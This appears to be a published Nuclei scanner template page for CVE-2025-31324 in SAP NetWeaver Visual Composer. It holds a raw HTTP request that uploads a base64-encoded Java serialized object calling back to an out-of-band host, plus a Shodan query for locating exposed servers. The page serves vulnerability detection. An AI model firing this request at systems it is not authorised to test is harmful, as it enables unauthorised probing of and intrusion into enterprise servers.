SAP NetWeaver Visual Composer Metadata Uploader - Deserialization

ID: CVE-2025-31324

Severity: critical

Author: iamnoooob,rootxharsh,parthmalhotra,pdresearch

Tags: cve,cve2025,sap,netweaver,rce,deserialization

Description

SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.

YAML Source

id: CVE-2025-31324

info:
  name: SAP NetWeaver Visual Composer Metadata Uploader - Deserialization
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
  reference:
    - https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/
    - https://www.theregister.com/2025/04/25/sap_netweaver_patch/
    - https://me.sap.com/notes/3594142
    - https://url.sap/sapsecuritypatchday
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-31324
    cwe-id: CWE-434
    epss-score: 0.00043
    epss-percentile: 0.12532
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SAP NetWeaver Application Server Java"
  tags: cve,cve2025,sap,netweaver,rce,deserialization

variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',54,'prefix')}}"


http:
  - raw:
      - |
        POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data

        {{zip('.properties',replace(base64_decode('rO0ABXNyABRqYXZhLnV0aWwuUHJvcGVydGllczkS0HpwNj6YAgABTAAIZGVmYXVsdHN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHIAE2phdmEudXRpbC5IYXNodGFibGUTuw8lIUrkuAMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAADdwgAAAAFAAAAAnQADnByb2plY3QtbmF0dXJlc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAADHcIAAAAEAAAAAFzcgAMamF2YS5uZXQuVVJMliU3Nhr85HIDAAdJAAhoYXNoQ29kZUkABHBvcnRMAAlhdXRob3JpdHl0ABJMamF2YS9sYW5nL1N0cmluZztMAARmaWxlcQB+AAhMAARob3N0cQB+AAhMAAhwcm90b2NvbHEAfgAITAADcmVmcQB+AAh4cP//////////dAA2YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhdAAAcQB+AAp0AARodHRwcHh0AD1odHRwOi8vYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheHQAC0VYUE9SVC1OQU1FdAATc29tZV9wcm9qZWN0X25hbWV4eHhw'),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',payload))}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(body, 'FAILED', 'Cause')
        condition: and
# digest: 4a0a00473045022100f5b505da6330ce6f914842169ea999457eb6ccd6702d7f10011b8b67aabd107b02203d3504d0f406612d5ccbdde93d7c452e029e4393550688a47e9410d9ce68425a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-31324.yaml"

View on Github